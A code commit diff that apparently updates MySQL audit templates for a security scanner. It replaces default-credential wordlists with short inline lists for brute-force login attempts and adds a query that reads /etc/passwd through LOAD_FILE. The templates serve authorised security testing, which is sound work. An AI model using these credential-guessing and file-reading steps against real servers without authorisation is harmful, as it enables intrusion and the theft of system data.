mysql creds -update

2024-03-22 19:41:12 +05:30 · 2024-03-22 19:41:12 +05:30 · b151c4a41f
parent f31b32622b
commit b151c4a41f
5 changed files with 30 additions and 25 deletions
--- a/javascript/audit/mysql/mysql-load-file.yaml
+++ b/javascript/audit/mysql/mysql-load-file.yaml
@ -28,17 +28,15 @@ javascript:

    payloads:
      usernames:
-        - anonymous
        - root
        - admin
        - mysql
-        - nagiosxi
+        - test
      passwords:
-        - SqlServer0
        - root
-        - cloudera
        - admin
-        - moves
+        - mysql
+        - test
    attack: clusterbomb

    stop-at-first-match: true
--- a/javascript/enumeration/mysql/mysql-default-login.yaml
+++ b/javascript/enumeration/mysql/mysql-default-login.yaml
@ -28,13 +28,26 @@ javascript:
      User: "{{usernames}}"
      Pass: "{{passwords}}"

-    threads: 10
-    attack: pitchfork
+    args:
+      Host: "{{Host}}"
+      Port: "3306"
+      Query: SELECT LOAD_FILE('/etc/passwd')
+      User: "{{usernames}}"
+      Pass: "{{passwords}}"

    payloads:
-      usernames: helpers/wordlists/mysql-users.txt
-      passwords: helpers/wordlists/mysql-passwords.txt
-    stop-at-first-match: true
+      usernames:
+        - root
+        - admin
+        - mysql
+        - test
+      passwords:
+        - root
+        - admin
+        - mysql
+        - test
+        -
+    attack: clusterbomb

    matchers:
      - type: dsl
--- a/javascript/enumeration/mysql/mysql-show-databases.yaml
+++ b/javascript/enumeration/mysql/mysql-show-databases.yaml
@ -27,17 +27,15 @@ javascript:

    payloads:
      usernames:
-        - anonymous
        - root
        - admin
        - mysql
-        - nagiosxi
+        - test
      passwords:
-        - SqlServer0
        - root
-        - cloudera
        - admin
-        - moves
+        - mysql
+        - test
    attack: clusterbomb

    stop-at-first-match: true
--- a/javascript/enumeration/mysql/mysql-show-variables.yaml
+++ b/javascript/enumeration/mysql/mysql-show-variables.yaml
@ -27,17 +27,15 @@ javascript:

    payloads:
      usernames:
-        - anonymous
        - root
        - admin
        - mysql
-        - nagiosxi
+        - test
      passwords:
-        - SqlServer0
        - root
-        - cloudera
        - admin
-        - moves
+        - mysql
+        - test
    attack: clusterbomb

    stop-at-first-match: true
--- a/javascript/enumeration/mysql/mysql-user-enum.yaml
+++ b/javascript/enumeration/mysql/mysql-user-enum.yaml
@ -29,17 +29,15 @@ javascript:

    payloads:
      usernames:
-        - anonymous
        - root
        - admin
        - mysql
-        - nagiosxi
+        - test
      passwords:
-        - SqlServer0
        - root
-        - cloudera
        - admin
-        - moves
+        - mysql
+        - test
    attack: clusterbomb

    stop-at-first-match: true